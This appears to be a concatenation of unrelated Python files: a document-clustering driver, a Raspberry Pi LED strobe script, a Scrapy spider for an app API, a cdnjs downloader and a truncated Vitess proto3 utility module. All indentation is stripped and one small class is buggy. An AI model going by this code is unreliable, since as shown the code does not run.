*Authors : Amar Bhagwandas Lalwani (MT2012073) and Raghav Bali (MT2012108)
*
*Date : May 18 2013
*
*Project : Hierarchical Clustering System (HCS)
*Version : 1.0
*Description : This is a demo to showcase the working of "Hierarchical Clustering Algorithm" based on globa;l and cluster frequent-itemsets.
* This demo works on a sample corpus which is preprocessed by "The Boolean Retrieval System (TBRS)" developed by the same authors.
* TBRS is used to generate "Term-Document-Frequency" triplet as output which is used to generate Hierarchical Clusters.
*
*Dependencies : The Boolean Retrieval System (TBRS) for preprocessing documents for clustering. [Developed by same authors]
* "python-fp-growth" for finding frequent itemsets. [Developed by Eric Naeseth]
**********************************************************************************************************************************************************
"""
"""
Import Packages
"""
import clustering_v1 ;
"""
Global Constants Defined
"""
# Global Minimum Support value. It should be ideally around 4-10% of the total documents.
global_minsup=4;
# Cluster Minimum Support value. 0.25 is a good value.
cluster_minsup=0.25;
"""
Function : generate_input_for_fpgrowth_and_document_vectors
Description : Generate Global Frequent Itemsets.Generate Transactions for Hierachical Clustering
Input Params : NA
Output : A list of the form : List[0] is a list of transactions (terms/document)
List[1] is a dictionary of the form {docname,transaction vector}
"""
output=clustering_v1.generate_input_for_fpgrowth_and_document_vectors();
"""
Function : find_global_freq_itemsets
Description : Generate Global Frequent Itemsets.
Input Params : Parameter 1 : List of unique terms/document, transaction vector.
Parameter 2 : Global minimum support value.
Output : A list of global frequent itemsets
"""
itemsets=clustering_v1.find_global_freq_itemsets(output[0],global_minsup);
"""
Function : find_feature_vectors_from_doc_vectors
Description : Generate Feature Vectors for each of the documents. Dimensionality reduction step
Input Params : Parameter 1 : List of global frequent itemsets
Parameter 2 : Dictionary of the form {docname,transaction vector}
Output : A dictionary of the form {docname,transaction vector} with transaction vector having terms with non-zero freqencies
"""
feature_vectors=clustering_v1.find_feature_vectors_from_doc_vectors(itemsets, output[1]);
"""
Function : find_initial_assignment
Description : Assign Documents to intial clusters. Documents may be assigned to multiple clusters at this moment.
Input Params : Parameter 1 : List of global frequent itemsets
Parameter 2 : Dictionary of the form {docname,transaction vector} with transaction vector having terms with non-zero freqencies
Output : A list of dictionaries. List[0] is a dictionary of the form {frequent itemsets, documents assigned}
List[1] is a dictonary of the form {documents, frequent itemssets}
"""
assgnmnts=clustering_v1.find_initial_assignment(itemsets, feature_vectors);
"""
Function : find_disjoint_clusters
Description : Assign Documents to disjoint clusters. Documents are assigned only to one cluster at this step.
Input Params : Parameter 1 : Document Cluster. Dictonary of the form {documents, frequent itemssets}
Parameter 2 : Initial Assignment. Dictionary of the form {frequent itemsets, documents assigned}
Parameter 3 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
having terms with non-zero freqencies
Parameter 4 : A list of global frequent itemsets
Parameter 5 : Cluser Minimum Support Values
Output : A dictionary of the form {frequent itemsets, document vectors}
"""
clustering=clustering_v1.find_disjoint_clusters(assgnmnts[1],assgnmnts[0], feature_vectors, itemsets, cluster_minsup);
"""
Printing the disjoint clusters formed above in clustering.txt
"""
fp=open('../ClusterOutput/disjoint_clusters.txt','w');
cluster_tuples=clustering.items();
pruned_tuples = {}
for cluster in cluster_tuples:
if(len(cluster[1])>0):
#Print the cluster label
fp.write(str(cluster[0]));
fp.write('-');
pruned_tuples[cluster[0]]=cluster[1];
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
#Print the document name
fp.write(docs);
fp.write('\n');
else:
#Print the document name
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Disjoint clusters : disjoint_clusters.txt [done] "
"""
Function : find_descendants
Description : Find descendants for all disjoint clusters to find cluster frequnet items and cluster support in score calculation.
Input Params : Parameter 1 : Disjoint Document Clusters. A dictionary of the form {frequent itemsets, document vectors}
Parameter 2 : Disjoint Document Clusters with non-empty document lists. Dictionary of the form {frequent itemsets, documents assigned}
Parameter 3 : A list of global frequent itemsets
Output : A dictionary of the form {frequent itemsets, document vectors}
"""
descendants=clustering_v1.find_descendants(clustering, pruned_tuples, itemsets);
"""
Print the descendants of each of the disjoint clusters
"""
fp=open('../ClusterOutput/descendants.txt','w');
cluster_tuples=descendants.items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
fp.write(docs);
fp.write('\n');
else:
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Descendants : descendants.txt [done] "
"""
Function : delete_empty_leaf_nodes
Description : Delete all empty leaf clusters
Input Params : Parameter 1 : Disjoint Document Clusters. A dictionary of the form {frequent itemsets, document vectors}
Parameter 2 : A list of global frequent itemsets
Output : A dictionary of the form {frequent itemsets, document vectors} with non-empty leaf nodes
"""
refined_clusters=clustering_v1.delete_empty_leaf_nodes(clustering, itemsets);
"""
Function : build_tree
Description : Build Tree structure from disjoint clusters pruned in previous steps
Input Params : Parameter 1 : A list of global frequent itemsets
Parameter 2 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
having terms with non-zero freqencies
Parameter 3 : Descendants. A dictionary of the form {frequent itemsets, document vectors}
Parameter 4 : A dictionary of the form {frequent itemsets, document vectors} with non-empty leaf nodes
Parameter 5 : Cluster Minimum Support value
Output : A list of dictionaries.
"""
tree=clustering_v1.build_tree(itemsets, feature_vectors, descendants, refined_clusters, cluster_minsup);
"""
Print the Tree structure
"""
fp=open('../ClusterOutput/initial_cluster_tree.txt','w');
cluster_tuples=tree[0].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
fp.write(docs);
fp.write('\n');
else:
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Initial Tree : initial_cluster_tree.txt [done] "
"""
Function : child_prune
Description : Prune Child nodes in a chain of clusters
Input Params : Parameter 1 : A dictionary of the form {frequent itemsets, document vectors} with non-empty leaf nodes
Parameter 2 : Tree[0]
Parameter 3 : Tree[1]
Parameter 4 : A list of global frequent itemsets
Parameter 5 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
having terms with non-zero freqencies
Parameter 6 : A dictionary of the form {frequent itemsets, document vectors}
Parameter 7 : Cluster Minimum support values
Output : Prune d tree dictionary
"""
pruning=clustering_v1.child_prune(refined_clusters, tree[0], tree[1], itemsets, feature_vectors, descendants, cluster_minsup);
"""
Print Pruned clusters
"""
fp=open('../ClusterOutput/pruned_clusters.txt','w');
cluster_tuples=pruning[0].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
fp.write(docs);
fp.write('\n');
else:
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Pruned Clusters : pruned_clusters.txt [done] "
"""
Print Pruned Clusters
"""
fp=open('../ClusterOutput/pruned_tree.txt','w');
cluster_tuples=pruning[1].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
for docs in cluster[1]:
if(docs==cluster[1][len(cluster[1])-1]):
fp.write(docs);
fp.write('\n');
else:
fp.write(docs);
fp.write(',');
fp.close();
print "[*]Pruned Tree : pruned_tree.txt [done] "
"""
Function : merge_siblings
Description : Prune Child nodes in a chain of clusters
Input Params : Parameter 1 : Pruned Tree [0]
Parameter 2 : Pruned Tree[1]
Parameter 3 : Pruned Tree[2]
Parameter 4 : A list of global frequent itemsets
Parameter 5 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
having terms with non-zero freqencies
Parameter 6 : A dictionary of the form {frequent itemsets, document vectors}
Parameter 7 : Cluster Minimum support values
Output : Sibling merged tree dictionary
"""
final=clustering_v1.merge_siblings(pruning[0], pruning[1], pruning[2], itemsets, feature_vectors, descendants, cluster_minsup);
"""
Print the final output
"""
fp=open('../ClusterOutput/output_clusters.txt','w');
cluster_tuples=final[0].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
fp.write(str(cluster[1]));
fp.write('\n');
fp.close();
print "[*]Output Clusters : output_clusters.txt [done] "
"""
Print the parents
"""
fp=open('../ClusterOutput/output_tree.txt','w');
cluster_tuples=final[1].items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
fp.write(str(cluster[1]));
fp.write('\n');
fp.close();
print "[*]Output Tree : output_tree.txt [done] "
"""
Function : find_cluster_description
Description : Describe the clusters labels with corresponding cluster frequent items
Input Params : Parameter 1 : Final Tree [0]
Parameter 2 : Final Tree [1]
Parameter 3 : Final Tree [2]
Parameter 4 : Feature Vectors. A dictionary of the form {docname,transaction vector} with transaction vector
having terms with non-zero freqencies
Parameter 5 : list of global frequent itemsets
Parameter 6 : Cluster Minimum support values
Output : Dictionary of cluster label description
"""
description=clustering_v1.find_cluster_description(final[0], final[1], final[2], feature_vectors, itemsets, cluster_minsup);
"""
Print the cluster description
"""
fp=open('../ClusterOutput/cluster_description.txt','w');
cluster_tuples=description.items();
for cluster in cluster_tuples:
if(len(cluster[1])>0):
fp.write(str(cluster[0]));
fp.write('-');
fp.write(str(cluster[1]));
fp.write('\n');
fp.close();
print "[*]Cluster Description : cluster_description.txt [done] "
"""
**********************************************************************************************************************************************************
End of Code
**********************************************************************************************************************************************************
"""
|
import sys #import sys to get arguments
mode=sys.argv[1]
#command parsing
if mode=="-help": #help screen
print("USAGE:")
print("python hertz.py hertz [pin] [length] [hertz] [debug]")
print("eg. \"python hertz.py hertz 18 10 30\"")
print("python hertz.py delay [pin] [length] [delay] [debug]")
print("eg. \"python hertz.py delay 18 10 1\"")
print("python hertz.py customDelay [pin] [length] [offDelay] [onDelay] [debug]")
print("eg. \"python hertz.py customDelay 18 10 0.2 1\"")
print("for debug, add \"debug\" at the end of the command")
print("for infinite time, put \"-1\" as the time")
print("to oscillate between multiple pins, put [pin1,pin2] as the pin")
print("eg. python hertz.py hertz [18,23] -1 1")
quit()
elif mode=="hertz": #python hertz.py hertz [pin] [length] [hertz] [debug]
delay=None
onPercent=100
offPercent=100
hertz=float(sys.argv[4])
length=float(sys.argv[3])
onWait=(1.0/float(hertz))*(float(onPercent)/100.0) #calculate time for led to be on
offWait=(1.0/float(hertz))*(float(offPercent)/100.0) #calculate time for led to be off
try: #check for debug
if sys.argv[5]=="debug":
debug=True
except:
debug=False
elif mode=="delay": #python hertz.py delay [pin] [length] [delay] [debug]
hertz=None
onPercent=100
offPercent=100
length=float(sys.argv[3])
delay=float(sys.argv[4])
onWait=delay #calculate time for led to be on
offWait=delay #calculate time for led to be off
try: #check for debug
if sys.argv[5]=="debug":
debug=True
except:
debug=False
elif mode=="customDelay": #python hertz.py customDelay [pin] [length] [offDelay] [onDelay] [debug]
hertz=None
onPercent=100
offPercent=100
length=float(sys.argv[3])
delay=None
offWait=float(sys.argv[4])
onWait=float(sys.argv[5])
try: #check for debug
if sys.argv[6]=="debug":
debug=True
except:
debug=False
#define debug funcions
if debug: #import datetime for debug logs
from datetime import datetime
def log(message): #define logging function to prevent repeated code
currentTime = str(datetime.now().time())
print("["+currentTime+"] "+message)
def done(): #log program exits if debug mode
if debug:
log("program exiting...")
quit()
#import needed libraries
#check if gpio installed
try:
import RPi.GPIO as GPIO #import pin comtrol
except:
print("RPI.GPIO not installed!!!")
done()
import time #import time for delay
#init GPIO
GPIO.setmode(GPIO.BCM) #use BCM pin numbering
GPIO.setwarnings(debug) #set warnings to on if debug mode, off otherwise
#parse pin to use
try:
pin=int(sys.argv[2])
doublePin=False
except:
import ast
pin=ast.literal_eval(sys.argv[2]) #parse input into list
pin1=pin[0] #set pin
pin2=pin[1]
doublePin=True
#log if doublepin
if debug:
log("doublePin: "+ str(doublePin))
log("pin1: "+ str(pin1))
log("pin2: "+ str(pin2))
#init pin to use
try: #check for valueError (invalidpin)
if not doublePin: #init single pin if not doublePin
GPIO.setup(int(pin),GPIO.OUT) #init used pin
else:
GPIO.setup(int(pin1),GPIO.OUT)
GPIO.setup(int(pin2),GPIO.OUT)
except:
if doublePin: #error
print("either pin "+str(pin1)+" or pin "+str(pin2)+" is invalid!")
else:
print("pin \""+str(pin)+"\" is not valid") #log error
done()
#print variables if debug
if debug:
log("mode: "+str(mode)) #print all arguments
log("pin: "+str(pin))
log("hertz: "+str(hertz)) #hertz mode only
log("delay: "+str(delay)) #delay mode only
log("length: "+str(length))
log("offPercent: "+str(offPercent))
log("onPercent: "+str(onPercent))
log("offWait: "+str(offWait))
log("onWait: "+str(onWait))
#LED control functions
def on(GPIOused): #define on function to avoid repeated code
GPIO.output(int(GPIOused),GPIO.HIGH) #on
if debug:
log("led on pin"+str(GPIOused)+" on")
def off(GPIOused): #define off function to avoid repeated code
GPIO.output(int(GPIOused),GPIO.LOW) #off
if debug:
log("led on pin"+str(GPIOused)+" off")
#check for infinite time
if int(length)==-1:
infinite=True
if debug:
log("length is -1. making infinite true") #log in debug
else:
infinite=False
#set needed vars
timeStrobing=0
if debug:
iteration=0 #track number of iterations if debug
#main program
try: #enclose loop to make keyboardinterrupt shut down led before closing
#strobe loop
while True:
#track number of iterations if debug
if debug:
iteration+=1 #increment iterations
log("iteration: "+str(iteration)) #print iterations
#toggle LED and wait
if not doublePin:
on(pin) #turn LED on\
else:
on(pin1)
off(pin2)
time.sleep(onWait) #delay before turning off
#add time used for strobing in previous half-iteration to counter
timeStrobing=timeStrobing+onWait
#print timeStrobing if debug
if debug:
log("timeStrobing: "+str(timeStrobing))
#if infinite, dont do timecheck
if not infinite:
if timeStrobing>=float(length): #check if timeStrobing is more than needed strobe time
if debug:
log("timeStrobing >= length") #print that timeStrobing >= length if debug mode
if doublePin: #turn off all leds
off(pin1)
else:
off(pin)
done() #exit program
#turn off led and wait
if not doublePin:
off(pin) #turn LED on\
else:
off(pin1)
on(pin2)
time.sleep(offWait) #delay before turning on
#add time used for strobing in previous half-iteration to counter
timeStrobing=timeStrobing+offWait #add delay before turning on to curent duration of strobing.
#print timeStrobing if debug
if debug:
log("timeStrobing: "+str(timeStrobing))
#if infinite, dont do timecheck
if not infinite: #if infinite, dont do timecheck
if timeStrobing>=float(length): #check if timeStrobing is more than needed strobe time
if debug:
log("timeStrobing >= length") #print that timeStrobing >= length if debug mode
if doublePin: #turn off all leds
off(pin2)
else:
off(pin)
done() #exit program
#error handling
except KeyboardInterrupt: #ctrl-c
if debug:
log("ctrl-c detected. turning led off and exiting.") #log that ctrl-c detected
if doublePin: #turn off all leds
off(pin1)
off(pin2)
else:
off(pin)
done()
|
# -*- coding: utf-8 -*-
import scrapy
import json
import time
from OwhatLab.conf.configure import *
from OwhatLab.utils.myredis import RedisClient
from OwhatLab.items import OwhatLabArticleItem, OwhatLabUserIterm
class SpiderArticlesInfoSpider(scrapy.Spider):
name = 'spider_articles_info'
allowed_domains = ['appo4.owhat.cn']
start_urls = ['http://appo4.owhat.cn/']
# 首页url:PreUrl + listMainUrl
PreUrl = "https://appo4.owhat.cn/api?"
# jalouse频道首页--该频道只有一个用户user_id=8244418,s所以无需遍历整个list直接赋值user_id即可
flag1 = 0
# 用户详情页--文章类信息url,各个频道相同:
#ArticleMainUrl = "apiv=1.0.0&client=%7B%22platform%22%3A%22ios%22%2C%22deviceid%22%3A%22E1DBCBDA-629A-4491-98BC-39B8DFEC248C%22%2C%22channel%22%3A%22AppStore%22%2C%22version%22%3A%221.2.2L%22%7D&cmd_m=home&cmd_s=userindex&data=%7B%22userid%22%3A{}%2C%22tabtype%22%3A2%2C%22pagenum%22%3A{}%2C%22pagesize%22%3A%2220%22%7D&requesttimestap=1575256658.578629&v=1.0"
# "apiv=1.0.0&client=%7B%22platform%22%3A%22ios%22%2C%22deviceid%22%3A%22E1DBCBDA-629A-4491-98BC-39B8DFEC248C%22%2C%22channel%22%3A%22AppStore%22%2C%22version%22%3A%221.2.2L%22%7D&cmd_m=home&cmd_s=userindex&data=%7B%22userid%22%3A%228244418%22%2C%22tabtype%22%3A2%2C%22pagenum%22%3A%221%22%2C%22pagesize%22%3A%2220%22%7D&requesttimestap=1575283078.534425&v=1.0"
#爬虫步骤: 先对具体某个频道的主页url进入找到内容list,每页显示20条,可以翻页展示-----再对list中的每一项找到对应的user_id-------然后在ArticleMainUrl中传入user_id参数,抓取该用户的全部文章信息
def __init__(self):
# connect redis
self.redisClient = RedisClient.from_settings(DB_CONF_DIR)
new_CHANNEL_CONF = json.dumps(CHANNEL_CONF)
self.redisClient.put("CHANNEL_CONF", new_CHANNEL_CONF, None, False)
self.article_set_key = REDIS_KEY['article_id']
channelJsonStr = self.redisClient.get("CHANNEL_CONF", -1)
self.channelDict = json.loads(channelJsonStr)
#print(self.channelDict)
print('Owhat文章信息爬虫开始...')
def start_requests(self):
for value in self.channelDict.values():
if value['itemIndex'] in ['1','2','9','10','11','12']:
self.flag1 = 1
curPage = 1
cmd_m = value['cmd_m']
cmd_s = value['cmd_s']
itemIndex = value['itemIndex']
columnid = str(value['columnid'])
apiv = value['apiv']
while curPage > 0 and self.flag1 == 1 and curPage < 81:
# print('curPage:', curPage)
print('文章信息抓取:正在抓取itemIndex={},频道={},第{}页内容...'.format(itemIndex, columnid, curPage))
if itemIndex == '2':
tempUrl = apiv.format(cmd_m, cmd_s, itemIndex, columnid, curPage)
else:
tempUrl = apiv.format(cmd_m, cmd_s, columnid, itemIndex, curPage)
curPage += 1
listUrl = self.PreUrl + tempUrl
#print('文章信息抓取listUrl:', listUrl)
time.sleep(5)
yield scrapy.Request(listUrl, method='POST', # headers=self.headers,
callback=self.parseListUrl)
else:
continue
def parseListUrl(self, response):
# print(response.text)
if response.status != 200:
print('get url error: ' + response.url)
return
rltJson = json.loads(response.text)
content = rltJson['data']
if content == "":
print('get list interface error: ' + response.text)
return
videoList = content['list'] #返回值是一个数组
#print('videoList内容:', videoList)
if len(videoList) > 0:
for videoInfo in videoList:
if 'articlestatus' in videoInfo:
#print('videoInfo:',videoInfo)
article_id = videoInfo['entityid']
#print(article_id)
flag = self.redisClient.sismember(self.article_set_key, article_id)
if flag == 1:
#print('该文章信息已爬虫,不再重复爬取')
continue
else:
self.redisClient.sadd(self.article_set_key, article_id)
yield self.getArticleInfoItem(videoInfo) # 此处yield函数不可少
else:
continue
else:
#print('该频道主页内容的文章爬虫已完毕!')
self.flag1 = 0
return
def getArticleInfoItem(self, article):
articleItem = OwhatLabArticleItem()
if 'entityid' in article:
articleItem['article_id'] = article['entityid']
if 'publishtime' in article:
articleItem['publish_time'] = str(article['publishtime'])[0:10]
if 'title' in article:
articleItem['title'] = article['title']
if 'entityimgurl' in article:
articleItem['article_imgurl'] = article['entityimgurl']
if 'columnid' in article:
articleItem['column_id'] = article['columnid']
if 'columnname' in article:
articleItem['column_name'] = article['columnname']
if 'publisherid' in article:
articleItem['publisher_id'] = article['publisherid']
if 'publishername' in article:
articleItem['publisher_name'] = article['publishername']
if 'publisheravatarimg' in article:
articleItem['publisher_pic_url'] = article['publisheravatarimg']
if 'columnid' not in article:
articleItem['column_id'] = "未知"
if 'columnname' not in article:
articleItem['column_name'] = "未知"
articleItem['update_time'] = time.time()
print('articleItem:', articleItem)
return articleItem # 此处必须用return返回
|
import WorldElement
class Toy(WorldElement):
def __init__(self, color, shape):
super(Toy, self).__init__(color, shape)
def display(self):
"Toy of color {0} and shape {1}".format(color, shape)
|
'''
This program is used to fetch all the versions of library which user wants.
Program used in the following way:
python3 cdnjsFetch.py ${library name}
After exec it, the program will create a new folder with the name of that library
and include all the files in the subfolder named with version number.
'''
import os
import progressbar
import requests
import sys
import json
import urllib.request
if(len(sys.argv) != 2):
print("Parameter Error")
print("Use this program in the following way:\r\n")
print("python3 cdnjsFetch.py ${library name}")
else:
libname = sys.argv[1]
print('Installing library "%s"' %(libname))
bar = progressbar.ProgressBar()
#libname='10up-sanitize.css'
print("Getting lib info through cdnjs API...")
bar.update(0)
get = requests.get('https://api.cdnjs.com/libraries/%s' %(libname))
response=''
for i in range(len(get.text)):
response += get.text[i]
#print(response)
print("\r\nFinding download URLs...")
bar.update(10)
apidict = json.loads(response)
vnum = len(apidict['assets'])
print("\r\n%s versions of %s found in cdnjs." %(vnum, libname))
bar.update(20)
list = {}
verList = []
for ver in range(vnum):
v = apidict['assets'][ver]['version']
verList.append(v)
urlList = []
for fileList in apidict['assets'][ver]['files']:
urlList.append("https://cdnjs.cloudflare.com/ajax/libs/" + libname + "/" + apidict['assets'][ver]['version'] + "/" + fileList)
list[v] = urlList
print(list)
bar.update(50)
#print(urlList)
print(os.path.abspath(__file__))
if not os.path.exists("libs"):
os.mkdir("libs")
os.chdir(os.path.dirname(os.path.abspath(__file__)) + "/libs")
if not os.path.exists(libname):
os.makedirs(libname)
else:
print("A folder named %s already exist in ./lib folder. Program terminated." %(libname))
exit(2)
os.chdir(os.path.dirname(os.path.abspath(__file__)) + "/" + libname)
for v in verList:
os.mkdir(v)
print(os.path.dirname(os.path.abspath(__file__)))
os.chdir(os.path.dirname(os.path.abspath(__file__)) + "/" + v)
print(os.path.dirname(os.path.abspath(__file__)))
for url in list[v]:
index = url.rfind("/")
name = url[index + 1:]
print(url)
print(name)
urllib.request.urlretrieve(url, name)
os.chdir("../")
bar.update(100)
|
#from datetime import datetime,timedelta
#creattime = datetime.now()
#a = creattime.strftime('%d/%m/%Y %H:%M:%S')
#print(a)
#a={}
#b = {}
#b['c'] = 0
#a['b']= b
#print(a)
#a = {}
#b = {}
#b ['v'] = 1
#a ['b'] = b
#a ['c'] = 1
#for i in a:
# print(i)
for i in range(10,100):
for j in range(0,9):
print(i)
print(j)
break
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utility module for proto3-python conversions.
This module defines the conversion functions from proto3 to python,
and utility methods / classes to convert requests / responses for any
python connector using the proto3 requests / responses.
"""
import datetime
from decimal import Decimal
from vtproto import query_pb2
from vtproto import topodata_pb2
from vtproto import vtgate_pb2
from vtproto import vtrpc_pb2
from vtdb import field_types
from vtdb import keyrange_constants
from vtdb import keyspace
from vtdb import times
from vtdb import vtgate_utils
# conversions is a map of type to the conversion function that needs
# to be used to convert the incoming array of bytes to the
# corresponding native python type.
# If a type doesn't need conversion, it's not in the map.
conversions = {
query_pb2.INT8: int,
query_pb2.UINT8: int,
query_pb2.INT16: int,
query_pb2.UINT16: int,
query_pb2.INT24: int,
query_pb2.UINT24: int,
query_pb2.INT32: int,
query_pb2.UINT32: int,
query_pb2.INT64: int,
query_pb2.UINT64: long,
query_pb2.FLOAT32: float,
query_pb2.FLOAT64: float,
query_pb2.TIMESTAMP: times.DateTimeOrNone,
query_pb2.DATE: times.DateOrNone,
query_pb2.TIME: times.TimeDeltaOrNone,
query_pb2.DATETIME: times.DateTimeOrNone,
query_pb2.YEAR: int,
query_pb2.DECIMAL: Decimal,
# query_pb2.TEXT: no conversion
# query_pb2.BLOB: no conversion
# query_pb2.VARCHAR: no conversion
# query_pb2.VARBINARY: no conversion
# query_pb2.CHAR: no conversion
# query_pb2.BINARY: no conversion
# query_pb2.BIT: no conversion
# query_pb2.ENUM: no conversion
# query_pb2.SET: no conversion
# query_pb2.TUPLE: no conversion
}
# legacy_code_to_code_map maps legacy error codes
# to the new code that matches grpc's cannonical error codes.
legacy_code_to_code_map = {
vtrpc_pb2.SUCCESS_LEGACY: vtrpc_pb2.OK,
vtrpc_pb2.CANCELLED_LEGACY: vtrpc_pb2.CANCELED,
vtrpc_pb2.UNKNOWN_ERROR_LEGACY: vtrpc_pb2.UNKNOWN,
vtrpc_pb2.BAD_INPUT_LEGACY: vtrpc_pb2.INVALID_ARGUMENT,
vtrpc_pb2.DEADLINE_EXCEEDED_LEGACY: vtrpc_pb2.DEADLINE_EXCEEDED,
vtrpc_pb2.INTEGRITY_ERROR_LEGACY: vtrpc_pb2.ALREADY_EXISTS,
vtrpc_pb2.PERMISSION_DENIED_LEGACY: vtrpc_pb2.PERMISSION_DENIED,
vtrpc_pb2.RESOURCE_EXHAUSTED_LEGACY: vtrpc_pb2.RESOURCE_EXHAUSTED,
vtrpc_pb2.QUERY_NOT_SERVED_LEGACY: vtrpc_pb2.FAILED_PRECONDITION,
vtrpc_pb2.NOT_IN_TX_LEGACY: vtrpc_pb2.ABORTED,
vtrpc_pb2.INTERNAL_ERROR_LEGACY: vtrpc_pb2.INTERNAL,
vtrpc_pb2.TRANSIENT_ERROR_LEGACY: vtrpc_pb2.UNAVAILABLE,
vtrpc_pb2.UNAUTHENTICATED_LEGACY: vtrpc_pb2.UNAUTHENTICATED,
}
INT_UPPERBOUND_PLUS_ONE = 1<<63
def make_row(row, convs):
"""Builds a python native row from proto3 row, and conversion array.
Args:
row: proto3 query.Row object
convs: conversion function array
Returns:
an array of converted rows.
"""
converted_row = []
offset = 0
for i, l in enumerate(row.lengths):
if l == -1:
converted_row.append(None)
elif convs[i]:
converted_row.append(convs[i](row.values[offset:offset+l]))
offset += l
else:
converted_row.append(row.values[offset:offset+l])
offset += l
return converted_row
def build_value(v):
"""Build a proto value from any valid input."""
val = query_pb2.Value()
convert_value(v, val)
return val
def convert_value(value, proto_value, allow_lists=False):
"""Convert a variable from python type to proto type+value.
Args:
value: the python value.
proto_value: the proto3 object, needs a type and value field.
allow_lists: allows the use of python lists.
"""
if isinstance(value, bool):
proto_value.type = query_pb2.INT64
proto_value.value = str(int(value))
elif isinstance(value, int):
proto_value.type = query_pb2.INT64
proto_value.value = str(value)
elif isinstance(value, long):
if value < INT_UPPERBOUND_PLUS_ONE:
proto_value.type = query_pb2.INT64
else:
proto_value.type = query_pb2.UINT64
proto_value.value = str(value)
elif isinstance(value, float):
proto_value.type = query_pb2.FLOAT64
proto_value.value = str(value)
elif hasattr(value, '__sql_literal__'):
proto_value.type = query_pb2.VARBINARY
proto_value.value = str(value.__sql_literal__())
elif isinstance(value, datetime.datetime):
proto_value.type = query_pb2.VARBINARY
proto_value.value = times.DateTimeToString(value)
elif isinstance(value, datetime.date):
proto_value.type = query_pb2.VARBINARY
proto_value.value = times.DateToString(value)
elif isinstance(value, str):
proto_value.type = query_pb2.VARBINARY
proto_value.value = value
elif isinstance(value, field_types.NoneType):
proto_value.type = query_pb2.NULL_TYPE
elif allow_lists and isinstance(value, (set, tuple, list)):
# this only works for bind variables, not for entities.
proto_value.type = query_pb2.TUPLE
for v in list(value):
proto_v = proto_value.values.add()
convert_value(v, proto_v)
else:
proto_value.type = query_pb2.VARBINARY
proto_value.value = str(value)
def convert_bind_vars(bind_variables, request_bind_variables):
"""Convert binding variables to proto3.
Args:
bind_variables: a map of strings to python native types.
request_bind_variables: the proto3 object to add bind variables to.
"""
if not bind_variables:
return
for key, val in bind_variables.iteritems():
convert_value(val, request_bind_variables[key], allow_lists=True)
def convert_stream_event_statement(statement):
"""Converts encoded rows inside a StreamEvent.Statement to native types.
Args:
statement: the StreamEvent.Statement object.
Returns:
fields: array of names for the primary key columns.
rows: array of tuples for each primary key value.
"""
fields = []
rows = []
if statement.primary_key_fields:
convs = []
for field in statement.primary_key_fields:
fields.append(field.name)
convs.append(conversions.get(field.type))
for r in statement.primary_key_values:
row = tuple(make_row(r, convs))
rows.append(row)
return fields, rows
class Proto3Connection(object):
"""A base class for proto3-based python connectors.
It assumes the derived object will contain a proto3 self.session object.
"""
def __init__(self):
self._effective_caller_id = None
self.event_token = None
self.fresher = None
def _add_caller_id(self, request, caller_id):
"""Adds the vtgate_client.CallerID to the proto3 request, if any.
Args:
request: proto3 request (any of the {,stream,batch} execute queries).
caller_id: vtgate_client.CallerID object.
"""
if caller_id:
if caller_id.principal:
request.caller_id.principal = caller_id.principal
if caller_id.component:
request.caller_id.component = caller_id.component
if caller_id.subcomponent:
request.caller_id.subcomponent = caller_id.subcomponent
def _add_session(self, request):
"""Adds self.session to the request, if any.
Args:
request: the proto3 request to add session to.
"""
if self.session:
request.session.CopyFrom(self.session)
def update_session(self, response):
"""Updates the current session from the response, if it has one.
Args:
response: a proto3 response that may contain a session object.
"""
if response.HasField('session') and response.session:
self.session = response.session
def _convert_entity_ids(self, entity_keyspace_ids, request_eki):
"""Convert external entity id map to ProtoBuffer.
Args:
entity_keyspace_ids: map of entity_keyspace_id.
request_eki: destination proto3 list.
"""
for xid, kid in entity_keyspace_ids.iteritems():
eid = request_eki.add()
eid.keyspace_id = kid
convert_value(xid, eid, allow_lists=False)
def _add_key_ranges(self, request, key_ranges):
"""Adds the provided keyrange.KeyRange objects to the proto3 request.
Args:
request: proto3 request.
key_ranges: list of keyrange.KeyRange objects.
"""
for kr in key_ranges:
encoded_kr = request.key_ranges.add()
encoded_kr.start = kr.Start
encoded_kr.end = kr.End
def _extract_rpc_error(self, exec_method, error):
"""Raises a VitessError for a proto3 vtrpc.RPCError structure, if set.
Args:
exec_method: name of the method to use in VitessError.
error: vtrpc.RPCError structure.
Raises:
vtgate_utils.VitessError: if an error was set.
"""
if error.code:
raise vtgate_utils.VitessError(exec_method, error.code, error.message)
elif error.legacy_code:
raise vtgate_utils.VitessError(
exec_method,
legacy_code_to_code_map[error.legacy_code],
error.message)
def build_conversions(self, qr_fields):
"""Builds an array of fields and conversions from a result fields.
Args:
qr_fields: query result fields
Returns:
fields: array of fields
convs: conversions to use.
"""
fields = []
convs = []
for field in qr_fields:
fields.append((field.name, field.type))
convs.append(conversions.get(field.type))
return fields, convs
def _get_rowset_from_query_result(self, query_result):
